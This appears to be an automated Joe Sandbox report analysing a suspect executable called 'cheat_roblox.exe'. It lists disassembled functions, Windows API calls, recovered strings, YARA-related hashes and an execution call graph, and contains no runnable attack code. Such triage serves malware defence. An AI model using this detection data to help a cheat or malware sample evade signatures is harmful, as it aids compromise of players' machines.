                                                                                                                  • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                                                  • Instruction ID: 94313d1e59944aec99f77e057fe5de885ae42667a3242a7a7e3e1f9a73e0ae73
                                                                                                                  • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                                                  • Instruction Fuzzy Hash: C5511763B187C246E7258B35D8413696B91EB81B90F088235C7ECC7BD6EE2ED446D70A
                                                                                                                  Function 00007FF6E7E29408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                                  • String ID: SIZE
                                                                                                                  • API String ID: 449872665-3243624926
                                                                                                                  • Opcode ID: 049592b23eccf18b91a3e94430bb7a89aa9f7458b84fc95e0ae4febadba54acb
                                                                                                                  • Instruction ID: 70255e4be74d6319aa75a8b2d7f1af9a9058bd24c519fd094f017a078e2cafbf
                                                                                                                  • Opcode Fuzzy Hash: 049592b23eccf18b91a3e94430bb7a89aa9f7458b84fc95e0ae4febadba54acb
                                                                                                                  • Instruction Fuzzy Hash: 3741DF63A2868285EA10DB28E4413BE6360FF85790F505631EBED876D6EE3ED541C70A
                                                                                                                  Function 00007FF6E7E4C2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                  • String ID: C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                  • API String ID: 3307058713-3685224637
                                                                                                                  • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                                                  • Instruction ID: c5a763b7fcba2338c16e0d39f7e10fdecb27b065816bd7a6c8a02a1601f6cd0d
                                                                                                                  • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                                                  • Instruction Fuzzy Hash: 9C41B233A08A5686EB15DF25E4412BC77A4FF447C4B444031EAADC7B95EE3EE442D34A
                                                                                                                  Function 00007FF6E7E39B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Text$Dialog
                                                                                                                  • String ID: ASKNEXTVOL
                                                                                                                  • API String ID: 2638039312-3402441367
                                                                                                                  • Opcode ID: 75a4ef6a6cdb84fc8c98b7401f85638b76a9530d4b428818baa7d4c6ec3066de
                                                                                                                  • Instruction ID: 35bf3e6516370ef68c623277828c5fd8f91a6a4a6329036e7bb19daba4d4d957
                                                                                                                  • Opcode Fuzzy Hash: 75a4ef6a6cdb84fc8c98b7401f85638b76a9530d4b428818baa7d4c6ec3066de
                                                                                                                  • Instruction Fuzzy Hash: 5C41B423A0C68291FA109B12E5943B927A1BF85BC4F140035DEED877A6DF3FE845C74A
                                                                                                                  Function 00007FF6E7E29638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide_snwprintf
                                                                                                                  • String ID: $%s$@%s
                                                                                                                  • API String ID: 2650857296-834177443
                                                                                                                  • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                                                  • Instruction ID: f0fcd4b764d4b0ffff91b89089d18f80a35924b2015870fb74f9d70fd247d55c
                                                                                                                  • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                                                  • Instruction Fuzzy Hash: 9B31E673B18A8B96EA10CF66E4407F923A0FB44784F402032EEAD67795EE3EE505C745
                                                                                                                  Function 00007FF6E7E4EB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileHandleType
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3000768030-2766056989
                                                                                                                  • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                                                  • Instruction ID: 96c07c816db308c3ddba59dd5c6bc3398d493a9a8d0e90300714afac5c9974ed
                                                                                                                  • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                                                  • Instruction Fuzzy Hash: 08218923A0874341EB748B25D4902792651EB85774F281335D6FF877D4EE3EE882E34A
                                                                                                                  Function 00007FF6E7E44078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E7E41D3E), ref: 00007FF6E7E440BC
                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6E7E41D3E), ref: 00007FF6E7E44102
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                  • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                                                  • Instruction ID: 8e28ceae451045ed200a7a4ae8734a80d888ef3c2619a2bd6f809a54eddce7f8
                                                                                                                  • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                                                  • Instruction Fuzzy Hash: 6A116D32608B8582EB208B15F44426977E1FB88B88F184230DFDC47754EF3DC562C705
                                                                                                                  Function 00007FF6E7E2EA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E7E2E95F,?,?,?,00007FF6E7E2463A,?,?,?), ref: 00007FF6E7E2EA63
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E7E2E95F,?,?,?,00007FF6E7E2463A,?,?,?), ref: 00007FF6E7E2EA6E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                  • API String ID: 1211598281-2248577382
                                                                                                                  • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                                                  • Instruction ID: a7697d0cf1b93c97dc36027e066ea238c7f6f2bb0a2c596829fe5b2e6d363eef
                                                                                                                  • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                                                  • Instruction Fuzzy Hash: B1E01A63E1984381F640A725FC466B822117FA0770F904330D0BEC21E2DF2EA949830A
                                                                                                                  Function 00007FF6E7E2A43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindHandleModuleResource
                                                                                                                  • String ID: RTL
                                                                                                                  • API String ID: 3537982541-834975271
                                                                                                                  • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                                                  • Instruction ID: b791948c79d683252676163c51e89823bf57ce7a56aae9b6c94e07612b492769
                                                                                                                  • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                                                  • Instruction Fuzzy Hash: B6D05E92F0964A82FF198B72F44937513605F18F41F484038CCAE87390EE2ED588C79A

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:21%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:2.1%
                                                                                                                  Total number of Nodes:485
                                                                                                                  Total number of Limit Nodes:8
                                                                                                                  execution_graph 1396 10f443f 1397 10f444b ___free_lconv_mon 1396->1397 1398 10f445f 1397->1398 1399 10f4452 GetLastError ExitThread 1397->1399 1410 110a1c5 GetLastError 1398->1410 1401 10f4464 1460 110d0f8 1401->1460 1405 10f447b 1465 10f461e 1405->1465 1411 110a1e1 1410->1411 1412 110a1db 1410->1412 1416 110a1e5 SetLastError 1411->1416 1471 110cd5a 1411->1471 1483 110cd1b 1412->1483 1420 110a275 1416->1420 1421 110a27a 1416->1421 1420->1401 1499 10f462c 1421->1499 1422 110a21a 1425 110cd5a ___free_lconv_mon 6 API calls 1422->1425 1423 110a22b 1426 110cd5a ___free_lconv_mon 6 API calls 1423->1426 1431 110a228 1425->1431 1427 110a237 1426->1427 1432 110a252 1427->1432 1433 110a23b 1427->1433 1428 110a291 1430 110cd5a ___free_lconv_mon 6 API calls 1428->1430 1440 110a297 1428->1440 1429 110a27f 1429->1428 1434 110cd1b ___free_lconv_mon 6 API calls 1429->1434 1436 110a2ab 1430->1436 1488 110a4b0 1431->1488 1494 1109ff3 1432->1494 1437 110cd5a ___free_lconv_mon 6 API calls 1433->1437 1434->1428 1436->1440 1442 110b99b ___free_lconv_mon 14 API calls 1436->1442 1437->1431 1443 10f462c 43 API calls 1440->1443 1444 110a29c 1440->1444 1441 110a4b0 ___free_lconv_mon 14 API calls 1441->1416 1445 110a2bb 1442->1445 1446 110a315 1443->1446 1444->1401 1447 110a2c3 1445->1447 1448 110a2d8 1445->1448 1449 110cd5a ___free_lconv_mon 6 API calls 1447->1449 1450 110cd5a ___free_lconv_mon 6 API calls 1448->1450 1451 110a2cf 1449->1451 1452 110a2e4 1450->1452 1457 110a4b0 ___free_lconv_mon 14 API calls 1451->1457 1453 110a2f7 1452->1453 1454 110a2e8 1452->1454 1456 1109ff3 ___free_lconv_mon 14 API calls 1453->1456 1455 110cd5a ___free_lconv_mon 6 API calls 1454->1455 1455->1451 1458 110a302 1456->1458 1457->1440 1459 110a4b0 ___free_lconv_mon 14 API calls 1458->1459 1459->1444 1461 10f446f 1460->1461 1462 110d10a GetPEB 1460->1462 1461->1405 1468 110d003 1461->1468 1462->1461 1463 110d11d 1462->1463 1950 110cb8d 1463->1950 1953 10f44f4 1465->1953 1467 10f462b 1469 110caca ___free_lconv_mon 5 API calls 1468->1469 1470 110d01f 1469->1470 1470->1405 1511 110caca 1471->1511 1474 110cd94 TlsSetValue 1475 110a1fd 1475->1416 1476 110b99b 1475->1476 1477 110b9a8 ___free_lconv_mon 1476->1477 1478 110b9d3 RtlAllocateHeap 1477->1478 1479 110b9e8 1477->1479 1526 11125ed 1477->1526 1478->1477 1480 110a212 1478->1480 1529 10ee672 1479->1529 1480->1422 1480->1423 1484 110caca ___free_lconv_mon 5 API calls 1483->1484 1485 110cd37 1484->1485 1486 110cd40 1485->1486 1487 110cd52 TlsGetValue 1485->1487 1486->1411 1489 110a4bb RtlFreeHeap 1488->1489 1493 110a4e5 1488->1493 1490 110a4d0 GetLastError 1489->1490 1489->1493 1491 110a4dd ___free_lconv_mon 1490->1491 1492 10ee672 ___free_lconv_mon 12 API calls 1491->1492 1492->1493 1493->1416 1566 1109e87 1494->1566 1708 1103980 1499->1708 1503 10f4665 1759 110447d 1503->1759 1504 10f4646 IsProcessorFeaturePresent 1506 10f4652 1504->1506 1505 10f463c 1505->1503 1505->1504 1753 10ee378 1506->1753 1510 10f46a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 1510->1429 1512 110caf8 1511->1512 1516 110caf4 1511->1516 1512->1516 1518 110c9ff 1512->1518 1515 110cb12 GetProcAddress 1515->1516 1517 110cb22 ___free_lconv_mon 1515->1517 1516->1474 1516->1475 1517->1516 1524 110ca10 ___free_lconv_mon 1518->1524 1519 110caa6 1519->1515 1519->1516 1520 110ca2e LoadLibraryExW 1521 110ca49 GetLastError 1520->1521 1522 110caad 1520->1522 1521->1524 1522->1519 1523 110cabf FreeLibrary 1522->1523 1523->1519 1524->1519 1524->1520 1525 110ca7c LoadLibraryExW 1524->1525 1525->1522 1525->1524 1532 111261a 1526->1532 1543 110a316 GetLastError 1529->1543 1531 10ee677 1531->1480 1533 1112626 ___free_lconv_mon 1532->1533 1538 1104802 EnterCriticalSection 1533->1538 1535 1112631 1539 111266d 1535->1539 1538->1535 1542 110484a LeaveCriticalSection 1539->1542 1541 11125f8 1541->1477 1542->1541 1544 110a332 1543->1544 1545 110a32c 1543->1545 1547 110cd5a ___free_lconv_mon 6 API calls 1544->1547 1564 110a336 SetLastError 1544->1564 1546 110cd1b ___free_lconv_mon 6 API calls 1545->1546 1546->1544 1548 110a34e 1547->1548 1550 110b99b ___free_lconv_mon 12 API calls 1548->1550 1548->1564 1551 110a363 1550->1551 1552 110a36b 1551->1552 1553 110a37c 1551->1553 1554 110cd5a ___free_lconv_mon 6 API calls 1552->1554 1555 110cd5a ___free_lconv_mon 6 API calls 1553->1555 1556 110a379 1554->1556 1557 110a388 1555->1557 1561 110a4b0 ___free_lconv_mon 12 API calls 1556->1561 1558 110a3a3 1557->1558 1559 110a38c 1557->1559 1562 1109ff3 ___free_lconv_mon 12 API calls 1558->1562 1560 110cd5a ___free_lconv_mon 6 API calls 1559->1560 1560->1556 1561->1564 1563 110a3ae 1562->1563 1565 110a4b0 ___free_lconv_mon 12 API calls 1563->1565 1564->1531 1565->1564 1567 1109e93 ___free_lconv_mon 1566->1567 1580 1104802 EnterCriticalSection 1567->1580 1569 1109e9d 1581 1109ecd 1569->1581 1572 1109f99 1573 1109fa5 ___free_lconv_mon 1572->1573 1585 1104802 EnterCriticalSection 1573->1585 1575 1109faf 1586 110a17a 1575->1586 1577 1109fc7 1590 1109fe7 1577->1590 1580->1569 1584 110484a LeaveCriticalSection 1581->1584 1583 1109ebb 1583->1572 1584->1583 1585->1575 1587 110a189 ___free_lconv_mon 1586->1587 1589 110a1b0 ___free_lconv_mon 1586->1589 1587->1589 1593 11134ce 1587->1593 1589->1577 1707 110484a LeaveCriticalSection 1590->1707 1592 1109fd5 1592->1441 1594 11134e4 1593->1594 1595 111354e 1593->1595 1594->1595 1599 1113517 1594->1599 1602 110a4b0 ___free_lconv_mon 14 API calls 1594->1602 1597 110a4b0 ___free_lconv_mon 14 API calls 1595->1597 1620 111359c 1595->1620 1598 1113570 1597->1598 1600 110a4b0 ___free_lconv_mon 14 API calls 1598->1600 1601 1113539 1599->1601 1607 110a4b0 ___free_lconv_mon 14 API calls 1599->1607 1603 1113583 1600->1603 1604 110a4b0 ___free_lconv_mon 14 API calls 1601->1604 1605 111350c 1602->1605 1606 110a4b0 ___free_lconv_mon 14 API calls 1603->1606 1608 1113543 1604->1608 1621 11127d2 1605->1621 1612 1113591 1606->1612 1613 111352e 1607->1613 1615 110a4b0 ___free_lconv_mon 14 API calls 1608->1615 1609 111360a 1610 110a4b0 ___free_lconv_mon 14 API calls 1609->1610 1616 1113610 1610->1616 1617 110a4b0 ___free_lconv_mon 14 API calls 1612->1617 1649 1112c86 1613->1649 1614 11135aa 1614->1609 1619 110a4b0 14 API calls ___free_lconv_mon 1614->1619 1615->1595 1616->1589 1617->1620 1619->1614 1661 111363f 1620->1661 1622 11127e3 1621->1622 1648 11128cc 1621->1648 1623 11127f4 1622->1623 1624 110a4b0 ___free_lconv_mon 14 API calls 1622->1624 1625 1112806 1623->1625 1627 110a4b0 ___free_lconv_mon 14 API calls 1623->1627 1624->1623 1626 1112818 1625->1626 1628 110a4b0 ___free_lconv_mon 14 API calls 1625->1628 1629 111282a 1626->1629 1630 110a4b0 ___free_lconv_mon 14 API calls 1626->1630 1627->1625 1628->1626 1631 110a4b0 ___free_lconv_mon 14 API calls 1629->1631 1633 111283c 1629->1633 1630->1629 1631->1633 1632 111284e 1635 110a4b0 ___free_lconv_mon 14 API calls 1632->1635 1637 1112860 1632->1637 1633->1632 1634 110a4b0 ___free_lconv_mon 14 API calls 1633->1634 1634->1632 1635->1637 1636 1112872 1639 1112884 1636->1639 1640 110a4b0 ___free_lconv_mon 14 API calls 1636->1640 1637->1636 1638 110a4b0 ___free_lconv_mon 14 API calls 1637->1638 1638->1636 1641 1112896 1639->1641 1643 110a4b0 ___free_lconv_mon 14 API calls 1639->1643 1640->1639 1642 11128a8 1641->1642 1644 110a4b0 ___free_lconv_mon 14 API calls 1641->1644 1645 11128ba 1642->1645 1646 110a4b0 ___free_lconv_mon 14 API calls 1642->1646 1643->1641 1644->1642 1647 110a4b0 ___free_lconv_mon 14 API calls 1645->1647 1645->1648 1646->1645 1647->1648 1648->1599 1650 1112c93 1649->1650 1651 1112ceb 1649->1651 1652 1112ca3 1650->1652 1653 110a4b0 ___free_lconv_mon 14 API calls 1650->1653 1651->1601 1654 1112cb5 1652->1654 1655 110a4b0 ___free_lconv_mon 14 API calls 1652->1655 1653->1652 1656 1112cc7 1654->1656 1657 110a4b0 ___free_lconv_mon 14 API calls 1654->1657 1655->1654 1658 1112cd9 1656->1658 1659 110a4b0 ___free_lconv_mon 14 API calls 1656->1659 1657->1656 1658->1651 1660 110a4b0 ___free_lconv_mon 14 API calls 1658->1660 1659->1658 1660->1651 1662 111364c 1661->1662 1666 111366b 1661->1666 1662->1666 1667 11131a1 1662->1667 1665 110a4b0 ___free_lconv_mon 14 API calls 1665->1666 1666->1614 1668 111327f 1667->1668 1669 11131b2 1667->1669 1668->1665 1703 1112f00 1669->1703 1672 1112f00 ___free_lconv_mon 14 API calls 1673 11131c5 1672->1673 1674 1112f00 ___free_lconv_mon 14 API calls 1673->1674 1675 11131d0 1674->1675 1676 1112f00 ___free_lconv_mon 14 API calls 1675->1676 1677 11131db 1676->1677 1678 1112f00 ___free_lconv_mon 14 API calls 1677->1678 1679 11131e9 1678->1679 1680 110a4b0 ___free_lconv_mon 14 API calls 1679->1680 1681 11131f4 1680->1681 1682 110a4b0 ___free_lconv_mon 14 API calls 1681->1682 1683 11131ff 1682->1683 1684 110a4b0 ___free_lconv_mon 14 API calls 1683->1684 1685 111320a 1684->1685 1686 1112f00 ___free_lconv_mon 14 API calls 1685->1686 1687 1113218 1686->1687 1688 1112f00 ___free_lconv_mon 14 API calls 1687->1688 1689 1113226 1688->1689 1690 1112f00 ___free_lconv_mon 14 API calls 1689->1690 1691 1113237 1690->1691 1692 1112f00 ___free_lconv_mon 14 API calls 1691->1692 1693 1113245 1692->1693 1694 1112f00 ___free_lconv_mon 14 API calls 1693->1694 1695 1113253 1694->1695 1696 110a4b0 ___free_lconv_mon 14 API calls 1695->1696 1697 111325e 1696->1697 1698 110a4b0 ___free_lconv_mon 14 API calls 1697->1698 1699 1113269 1698->1699 1700 110a4b0 ___free_lconv_mon 14 API calls 1699->1700 1701 1113274 1700->1701 1702 110a4b0 ___free_lconv_mon 14 API calls 1701->1702 1702->1668 1704 1112f12 1703->1704 1705 1112f21 1704->1705 1706 110a4b0 ___free_lconv_mon 14 API calls 1704->1706 1705->1672 1706->1704 1707->1592 1762 11037b8 1708->1762 1711 11039c5 1712 11039d1 ___free_lconv_mon 1711->1712 1713 110a316 ___free_lconv_mon 14 API calls 1712->1713 1717 11039fe 1712->1717 1718 11039f8 1712->1718 1713->1718 1714 1103a45 1715 10ee672 ___free_lconv_mon 14 API calls 1714->1715 1716 1103a4a 1715->1716 1780 10ee574 1716->1780 1720 1103a71 1717->1720 1783 1104802 EnterCriticalSection 1717->1783 1718->1714 1718->1717 1741 1103a2f 1718->1741 1722 1103ab3 1720->1722 1723 1103ba4 1720->1723 1733 1103ae2 1720->1733 1729 110a1c5 43 API calls 1722->1729 1722->1733 1726 1103baf 1723->1726 1788 110484a LeaveCriticalSection 1723->1788 1728 110447d 23 API calls 1726->1728 1737 1103bb7 ___free_lconv_mon 1728->1737 1731 1103ad7 1729->1731 1730 110a1c5 43 API calls 1736 1103b37 1730->1736 1732 110a1c5 43 API calls 1731->1732 1732->1733 1784 1103b51 1733->1784 1734 1103c9e 1789 1104802 EnterCriticalSection 1734->1789 1739 110a1c5 43 API calls 1736->1739 1736->1741 1737->1734 1743 1103c09 1737->1743 1750 1103c18 1737->1750 1739->1741 1740 1103cb2 1742 1103cc9 SetConsoleCtrlHandler 1740->1742 1747 1103cda ___free_lconv_mon 1740->1747 1741->1505 1744 1103ce3 GetLastError 1742->1744 1742->1747 1746 110a316 ___free_lconv_mon 14 API calls 1743->1746 1743->1750 1790 10ee65f 1744->1790 1748 1103c23 1746->1748 1793 1103d55 1747->1793 1748->1750 1773 